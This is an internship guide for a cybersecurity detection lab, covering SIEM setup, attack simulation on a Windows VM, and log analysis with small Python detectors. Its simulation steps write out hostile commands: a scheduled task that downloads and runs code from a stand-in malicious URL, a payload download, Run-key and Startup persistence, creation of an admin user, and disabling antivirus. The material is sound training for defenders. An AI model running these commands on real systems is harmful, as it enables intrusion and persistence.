Phase 1 Internship Program Detailed Guide

The Phase 1 Internship Program aims to provide candidates with hands-on experience in cybersecurity threat detection through simulations and tool-based analysis. The program includes setting up a virtual environment, configuring necessary tools, and simulating various attack scenarios to generate logs for analysis. Participants will learn to identify patterns of malicious activity and prepare for building detection rules in subsequent steps.


Phase 1 Internship Program – Step-by-Step Guide

Objective of Phase 1

To introduce candidates to real-time cybersecurity threat detection use cases through hands-on simulations and
tool-based analysis.

Step 1: Setup Your Environment

1. Install VirtualBox / VMware + Kali Linux (or use any pre-configured VM).
2. Install ELK Stack (Elasticsearch, Logstash, Kibana) or Wazuh SIEM.
3. Configure Sysmon + Winlogbeat on Windows VM (for endpoint logging).
4. Prepare GitHub Repo:
o Create a GitHub repo named cyber-intern-phase-1.
o Maintain folders like /logs, /reports, /screenshots, /hints.

---------------------------------------------------------------------------------------------------------------

HINTS:

1. Brute Force Detection

Hint:
Look into authentication logs like /var/log/auth.log or Windows Event ID 4625. Focus on patterns where
multiple failed attempts are made from the same IP in a short time.

Tip: Think of Hydra or Burp Suite brute force modules.

2. Malware Detection

Hint:
Use VirusTotal or any.run to analyze suspicious files. In your SIEM, observe unexpected processes, registry
changes, or connections to unknown IPs.

Tip: Try simulating a malware dropper script with curl or Invoke-WebRequest and execute in a lab.

3. Data Exfiltration Detection

Hint:
Watch for large outbound traffic on non-standard ports. Analyze network logs, and use Wireshark to capture
exfiltration attempts.

Tip: Use netcat to simulate file transfer over HTTP, FTP, or DNS.

4. Suspicious Network Activity

Hint:
Use tools like Wireshark or tcpdump to monitor abnormal traffic patterns. Look for port scanning, repeated
connection attempts, or odd DNS queries.

Tip: Try nmap -sS and watch how it shows up in logs.

5. Phishing Email Detection

Hint:
Look for email headers, links to shortened or weird domains, and attachments with .exe, .js, or
.vbs extensions. Use email gateways or SIEM to flag these.

Tip: Use the open-source tool “GoPhish” to simulate phishing in your lab.

6. Unauthorized Access Attempt

Hint:
Audit logs are your best friend. Search for login attempts outside office hours, use of disabled accounts, or
access from unusual geolocations.

Tip: Use failed logon Event ID 4625 and success 4624 to compare patterns.

7. Suspicious File Download

Hint:
Use PowerShell logging (ModuleLogging, ScriptBlockLogging) to catch scripts like:

Invoke-WebRequest -Uri "http://malicious-url" -OutFile "evil.exe"

Tip: Enable Sysmon to detect ProcessCreate + network connections.

8. Privilege Escalation Attempt

Hint:
Check for creation of new admin users, or modifications to registry keys, services, or token
impersonation attempts.

Tip: Tools like whoami /priv, accesschk, and winPEAS reveal escalation paths.

9. Lateral Movement Detection

Hint:
Monitor SMB, WMI, RDP, or PsExec traffic between internal systems. Use Sysmon Event ID
3 and Windows Event ID 4624 to trace logons.

Tip: Try moving laterally using CrackMapExec or wmiexec from Impacket.

10. Command and Control (C2) Traffic Detection

Hint:
Detect beaconing patterns, especially regular intervals of outbound traffic. Look into PowerShell
Empire, Cobalt Strike, or DNS-based C2.

Tip: Set up a mock listener using Netcat or Empire and track outbound packets.
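The beaconing pattern this hint describes, as an added Python example that is not part of the original guide: a check over constructed Sysmon Event ID 3 records (simplified flat layout; event.code, @timestamp and destination.ip are assumed field names) that flags destinations contacted at near-constant intervals.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

START = datetime(2024, 1, 1, 9, 0, 0)  # base time for the constructed sample

def _connections(dest, interval_s, count, jitter_s=0):
    """Constructed Sysmon Event ID 3 records to `dest`, one every `interval_s`
    seconds, with `jitter_s` added to every second connection."""
    return [{"event.code": "3", "destination.ip": dest,
             "@timestamp": (START + timedelta(seconds=interval_s * i
                                              + (jitter_s if i % 2 else 0))).isoformat()}
            for i in range(count)]

# Constructed sample: one host is contacted every 60 s like a C2 beacon, the
# other at irregular, browsing-like intervals.
SAMPLE_EVENTS = (_connections("203.0.113.10", 60, 12)
                 + _connections("198.51.100.7", 60, 12, jitter_s=95))

def find_beacons(events, min_connections=8, max_cv=0.1):
    """Destinations whose outbound connections arrive at near-constant
    intervals: {dest_ip: mean_interval_s}. Regularity is measured as the
    coefficient of variation (stdev / mean) of the gaps between connections."""
    times = defaultdict(list)
    for e in events:
        if e.get("event.code") == "3":
            times[e["destination.ip"]].append(datetime.fromisoformat(e["@timestamp"]))
    beacons = {}
    for dest, seen in times.items():
        if len(seen) < min_connections:
            continue  # too few connections to judge regularity
        seen.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(seen, seen[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            beacons[dest] = round(avg, 1)
    return beacons
```

Raising max_cv loosens the regularity requirement; real beacons often add deliberate jitter, so tune it against your own baseline traffic.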

Pro Tip for All Challenges:

"If you're stuck, think like a hacker. Then, think how you'd detect it."

STEP 1 Approach

1. Install a Virtualization Tool

A virtualization tool allows you to run operating systems like Kali Linux or Windows in a sandboxed virtual
environment.

Recommended Options:

• Oracle VirtualBox (Free and open-source)
o Download: https://www.virtualbox.org
• VMware Workstation Player (Free for personal use)
o Download: https://www.vmware.com/products/workstation-player.html

Install Steps (VirtualBox Example):

• Download the installer for your OS (Windows/Linux/Mac).
• Run the installer with default options.
• Reboot your system (if prompted).

2. Download and Install Kali Linux or Ubuntu VM

Option 1: Kali Linux (for attack simulations)

• Download: https://www.kali.org/get-kali/#kali-virtual-machines
• Import .ova file into VirtualBox.
• Set CPU: 2 cores, RAM: 4 GB recommended.

Option 2: Ubuntu/Debian (for log collection/monitoring)

3. Install Windows 10 Virtual Machine (Target Machine)

• Use Microsoft's free Windows 10 VM
• This machine is used to simulate endpoint activity like brute force, malware, USB insertions.

Important Settings:

• Enable Sysmon and Winlogbeat (covered later).
• Disable Defender or Antivirus temporarily for testing malware detection.

4. Setup SIEM Platform (ELK or Wazuh)

Option 1: Wazuh (Recommended for beginners)

• Install guide: https://documentation.wazuh.com
• Wazuh includes:
o ElasticSearch for storing logs
o Kibana for visualizing
o Wazuh Manager for security alerts

Option 2: ELK Stack (Manual setup)

• Install:
o Elasticsearch
o Logstash
o Kibana
• Configure:
o Winlogbeat to send logs from Windows VM to Logstash
o Sysmon to generate detailed logs

5. Install Sysmon on Windows VM

Sysmon is a Windows system monitor that logs detailed events like process creations, network connections, and
file modifications.
Install:

Download from: https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

Command:

sysmon -accepteula -i sysmonconfig.xml

Use a community config like SwiftOnSecurity/sysmon-config

6. Install & Configure Winlogbeat

Winlogbeat ships logs from Windows to your ELK or Wazuh instance.

Steps:

• Download Winlogbeat for Windows.
• Configure winlogbeat.yml:

output.elasticsearch:
  hosts: ["http://your-elk-ip:9200"]

• Start the Winlogbeat service.

7. Enable Windows Security Event Logging

Ensure important logs are enabled:

• Audit logon events
• Audit object access
• Audit process creation

Use Local Group Policy Editor:

Run → gpedit.msc → Computer Configuration → Windows Settings → Security Settings → Local Policies → Audit Policy

8. Create a GitHub Repository for Submissions

Name: cyber-intern-phase-1

Structure:

/logs/

/screenshots/

/reports/

/hints/

README.md

Push:

• Screenshots of setup
• Config files
• Logs
• Summary notes

End of Step 1 Checklist

Item Status
VirtualBox/VMware Installed
Kali Linux VM ready
Windows 10 VM ready
Sysmon & Winlogbeat installed
SIEM (Wazuh/ELK) setup complete
GitHub repo created

Step 2: Understand the 10 Hints (Scenarios)

Objective of Step 2

To create realistic security events on a Windows system so that:

• Logs are captured by Sysmon and Winlogbeat
• Data flows into the SIEM (like Wazuh, ELK, or Graylog)
• You learn how threats are reflected in logs, which is essential for detection engineering and
investigations.

Components Involved

Component Purpose
Windows VM Host to perform malicious/suspicious activities
Sysmon Collects deep system-level events
Winlogbeat Forwards Windows event logs to the SIEM
SIEM (Wazuh/ELK) Centralized log storage and analysis

Why Simulate Events?

Cybersecurity teams rely on logs to:

• Detect attacks (brute force, malware, etc.)
• Monitor user and system behavior
• Investigate incidents post-breach

Simulating events = learning how attacks leave a trail in logs.

Types of Events to Simulate

Type Attack Simulation Purpose
Authentication Brute Force Observe login failures
Execution PowerShell, .bat file See how scripts run
Persistence Startup folder, registry Understand privilege misuse
Network Web request to fake sites Learn outbound traffic monitoring
Privilege Abuse Add admin user Detect unauthorized user creation

What Gets Logged?

Activity Event IDs / Log Types
Failed Login Windows 4625
PowerShell Execution Sysmon 1, PowerShell logs
File Creation/Execution Sysmon 11, 1
Network Connection Sysmon 3
Registry Modification Sysmon 13
Task Scheduler Abuse Windows 4698
USB Insertion System logs (Removable Drive Detection)

Event Categories in Logs

Category Example
Authentication Failed login, session logout
Process Creation EXE or script execution
Network Activity IP connections, DNS resolution
File Operations Create, modify, delete files
Registry Persistence mechanisms

Sample Use Case

👨💻 Simulating Brute Force

for ($i=1; $i -le 10; $i++) {
    # each attempt fails on purpose and produces one Windows Event ID 4625
    net use \\127.0.0.1\IPC$ /user:FakeUser WrongPassword
}

Logs to expect:

• Windows 4625 (Failed Login)
• Event shows time, username, IP, and failure reason

Tools Used in Step 2

Tool Role
PowerShell Simulate commands/attacks
Sysmon Capture deep telemetry
Winlogbeat Send logs to Elasticsearch/Wazuh
Event Viewer Manually view Windows logs

Best Practices

• Document your steps: commands used, expected output, actual logs
• Take screenshots of Event Viewer or SIEM dashboards
• Push updates to GitHub daily
• Avoid real malware or payloads — simulations only

Each hint relates to a real-world use case:

• Brute Force
• Malware
• Data Exfiltration
• Suspicious Network Activity
• USB Activity
• etc.

Purpose of Hints:
To simulate attacker behavior and analyze logs using SIEM tools.

Outcome of Step 2

By the end of this step, you will:

• Understand how different attacks generate specific logs
• Know which tools capture which log types
• Be ready to write detections in the next step (Step 3)

STEP 2 Approach

Step 2: Simulate Events & Generate Logs (Detailed Guide)

Objective of This Step

To simulate realistic cybersecurity scenarios on your Windows VM so that logs can be generated, collected
by Winlogbeat, and analyzed in your SIEM (Wazuh or ELK). These logs will form the foundation for detections
and investigations in future steps.

Target Machine: Windows 10 VM

Make sure:

• Sysmon is running
• Winlogbeat is properly configured and started
• Logs are flowing to your SIEM

Simulated Security Scenarios

You will simulate 10 different activities to generate rich event logs. Below are instructions for each scenario.

Hint 1: Brute Force Login Attempts

What to do:

• Create a fake RDP login attempt using the following:

for ($i=1; $i -le 10; $i++) {
    net use \\127.0.0.1\IPC$ /user:FakeUser WrongPassword
}

What gets logged:

• Windows Event ID 4625 (Failed Logon)
• Sysmon may capture process and network-related activity

Hint 2: Suspicious PowerShell Usage

What to do:
Run the following:

powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAcwBtAG8AYwBoAC4AZQB4AGUAIgA=

(This base64 runs Start-Process "smoch.exe")

What gets logged:

• Sysmon Event ID 1 (Process Create)
• PowerShell transcript logs

Hint 3: USB Drive Insertion

What to do:

• Insert a USB drive into your Windows VM (or simulate via VBox).
• Copy and execute a file from it.

What gets logged:

• Sysmon: File creation and process execution
• Windows: Removable drive detection

Hint 4: Malware Execution Simulation

What to do:

• Create a .bat file with dummy commands:

@echo off
echo Simulating malware...
ping 8.8.8.8 -n 10

• Run it from Downloads/ or Temp/

What gets logged:

• File execution (Sysmon)
• Network connections

Hint 5: Registry Modification

What to do:

Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "evil" -Value "C:\temp\malware.exe"

What gets logged:

• Registry key modification (Sysmon Event ID 13)

📌 Hint 6: Suspicious Network Connection

What to do:

Invoke-WebRequest -Uri http://testphp.vulnweb.com

What gets logged:

• Sysmon Event ID 3 (Network Connection)
• Destination IP in the logs

Hint 7: Fileless Attack Simulation

What to do:

What gets logged:

• PowerShell command logs
• Sysmon process logs

Hint 8: Create Suspicious Scheduled Task

What to do:

schtasks /create /tn "Windows Update" /tr "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://malicious-url')" /sc minute /mo 1

What gets logged:

• Windows Event ID 4698 (Task creation)
• Sysmon: Process chain

Hint 9: Simulate Persistence

What to do:

• Place a file in the Startup folder:

copy evil.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\"

What gets logged:

• File copy (Sysmon ID 11)
• Process execution on reboot

Hint 10: Create a Local User (Privilege Abuse)

What to do:

net user attacker P@ssword123 /add
net localgroup administrators attacker /add

What gets logged:

• Event ID 4720 (User Creation)
• Event ID 4732 (Group membership change)

Validation: Confirm Logs are Reaching SIEM

1. Go to Kibana/Wazuh dashboard.
2. Check:
o Count of logs (timestamp, host)
o Sysmon logs
o Winlogbeat indices
o Search using:

event.code:"1" OR event.code:"4625"

Documentation & GitHub Push

Folder Structure:

/hints/
└── hint1_brute_force.png
└── hint2_ps_encoded_command.png
...
/logs/
└── event_logs.json
/screenshots/
└── dashboard_kibana.png

Push updates daily with proper commits like:

git commit -m "Completed Hint 1: Brute Force Attempt"

Step 3: Simulate Attacks / Behaviors - Analyze Logs & Understand Patterns

Objective of Step 3

The goal of this step is to analyze the logs you generated in Step 2 to:

• Identify patterns and indicators of malicious or suspicious activity
• Understand how different attack behaviors appear in logs
• Prepare yourself to build detection rules in Step 4

Why Log Analysis Is Critical

Logs are the evidence trail left by users, systems, and attackers.

Security depends on:

• Spotting deviations from normal activity
• Recognizing known indicators (e.g., failed login bursts)
• Connecting multiple log entries to form a threat timeline

Key Skills You'll Learn

Skill Explanation
Pattern Recognition Repeated failed logins, odd IP access
Correlation Linking process creation to file drops
TTP Mapping Aligning behavior with MITRE ATT&CK
Noise Filtering Separating normal from suspicious activity

Common Log Sources to Analyze

Log Type Events to Look For
Windows Security Log Event IDs 4624 (Login), 4625 (Failed Login), 4670 (Permissions Change)
Sysmon Logs Event ID 1 (Process Create), 3 (Network Connection), 11 (File Create), 13 (Registry Change)
Winlogbeat Output Forwarded logs to ELK/Wazuh
SIEM Dashboards Visual summaries of above logs

Sample Attack Pattern

Simulated Brute Force

You simulated repeated failed logins. Now analyze:

Field Value
Event ID 4625
Target Username Admin
Failure Reason Unknown user name or bad password
Source IP 127.0.0.1
Count > 10 in short time

What This Means:

This pattern indicates a brute force attack attempt. It could be automated or targeted.

How to Approach Log Analysis

Tools You Can Use:

• Event Viewer (on Windows)
• Kibana (if using ELK stack)
• Wazuh Dashboard
• Graylog Web Interface
• Notepad++ or Excel (for CSV exported logs)

Steps to Analyze:

1. Open logs using SIEM or local viewer
2. Filter by event type (e.g., 4625)
3. Look for repetition or anomalies
4. Correlate across logs (e.g., a login followed by process launch)
5. Map to attack types (see MITRE ATT&CK)

Real-world Detection Use Cases

Use Case Log Pattern
Brute Force Many 4625 logins in < 1 min
Malware Execution Sysmon Event ID 1 + file drop (ID 11)
Suspicious Network Activity Event ID 3 to rare domain
Persistence Registry change (Sysmon 13), new scheduled task
Privilege Escalation User added to admin group (Event ID 4732)
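The brute-force pattern from the sample above and the Sysmon 1 + 11 row of this table, as an added Python example that is not part of the original guide. The events are constructed in a simplified flat layout; field names other than event.code and @timestamp (source_ip, target_user, process_guid, image, target_filename) are assumed stand-ins for the exported Winlogbeat fields.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def _ts(seconds):
    """Constructed timestamp: a fixed base time plus an offset in seconds."""
    return (datetime(2024, 1, 1, 9, 0, 0) + timedelta(seconds=seconds)).isoformat()

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample: 12 failed logons in 22 s from one source, one stray
# failure an hour later, and a powershell.exe start (Sysmon 1) followed by
# a file create (Sysmon 11) that shares its ProcessGuid.
SAMPLE_EVENTS = [
    {"event.code": "4625", "@timestamp": _ts(i * 2), "source_ip": "127.0.0.1", "target_user": "Admin"}
    for i in range(12)
] + [
    {"event.code": "4625", "@timestamp": _ts(3600), "source_ip": "10.0.0.5", "target_user": "bob"},
    {"event.code": "1", "@timestamp": _ts(100), "process_guid": "{A1}", "image": PS},
    {"event.code": "11", "@timestamp": _ts(103), "process_guid": "{A1}",
     "target_filename": "C:\\Users\\intern\\Downloads\\evil.exe"},
    {"event.code": "11", "@timestamp": _ts(200), "process_guid": "{B2}",
     "target_filename": "C:\\Temp\\notes.txt"},
]

def detect_brute_force(events, threshold=10, window_s=60):
    """Source IPs with at least `threshold` 4625 events inside any `window_s` span."""
    hits, recent = set(), defaultdict(deque)
    for e in sorted(events, key=lambda ev: ev["@timestamp"]):
        if e["event.code"] != "4625":
            continue
        now = datetime.fromisoformat(e["@timestamp"])
        q = recent[e["source_ip"]]  # sliding window per source, so a slow trickle is not flagged
        q.append(now)
        while (now - q[0]).total_seconds() > window_s:  # drop entries older than the window
            q.popleft()
        if len(q) >= threshold:
            hits.add(e["source_ip"])
    return hits

def correlate_process_file_drop(events, max_gap_s=30):
    """Pair each Sysmon 11 file create with the Sysmon 1 start of the same ProcessGuid."""
    starts = {e["process_guid"]: e for e in events if e["event.code"] == "1"}
    pairs = []
    for e in events:
        if e["event.code"] != "11" or e["process_guid"] not in starts:
            continue
        p = starts[e["process_guid"]]
        gap = (datetime.fromisoformat(e["@timestamp"])
               - datetime.fromisoformat(p["@timestamp"])).total_seconds()
        if 0 <= gap <= max_gap_s:  # file written shortly after the process started
            pairs.append((p["image"], e["target_filename"]))
    return pairs
```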

Tips for Good Analysis

• Use filters/search queries in SIEM to narrow down noise
• Document what you found: What log, what timestamp, what was unusual
• Compare against normal behavior (e.g., which users usually log in)

Outcome of Step 3

By the end of Step 3, you should:

• Be comfortable reading log files
• Know how different attacks look in logs
• Be ready to write detection rules to alert on such patterns (Step 4)

Use tools to simulate:

• Brute Force – Run hydra or ncrack on SSH/RDP.
• Malware Execution – Use test samples from sites like theZoo, and only inside the isolated lab VM.
• Data Exfiltration – Send large files to remote IPs.
• Suspicious Network Activity – Connect to non-standard ports or generate fake C2 traffic.
• USB Activity – Insert a USB and monitor Event IDs.

Step 4: Capture and Analyze Logs

1. Enable event logging on the test VM.
2. Use Sysmon + Winlogbeat to forward logs to ELK/Wazuh.
3. Analyze patterns like:
o Failed login attempts
o Unusual process execution
o Suspicious DNS queries
o Outbound traffic spikes

Step 5: Documentation Practice

Each student must:

• Take screenshots of simulation
• Describe:
o What they did
o What they observed in the logs
o How SIEM flagged the event (if configured)
• Add to GitHub:
o hint01_brute_force.md
o hint02_malware_exec.md
o etc.

Step 6: Upload to GitHub Weekly

Structure:

Step 7: Completion Criteria

• Must complete at least 8 out of 10 hints.
• Must push structured and clear documentation.
• Only then eligible for Phase 2 access.

Troubleshooting Tips

• Use online sandboxes like TryHackMe or HackTheBox if you don’t have setup.
• Refer to MITRE ATT&CK for tactics and techniques.
• YouTube: Search for “how to simulate brute force with hydra” etc.
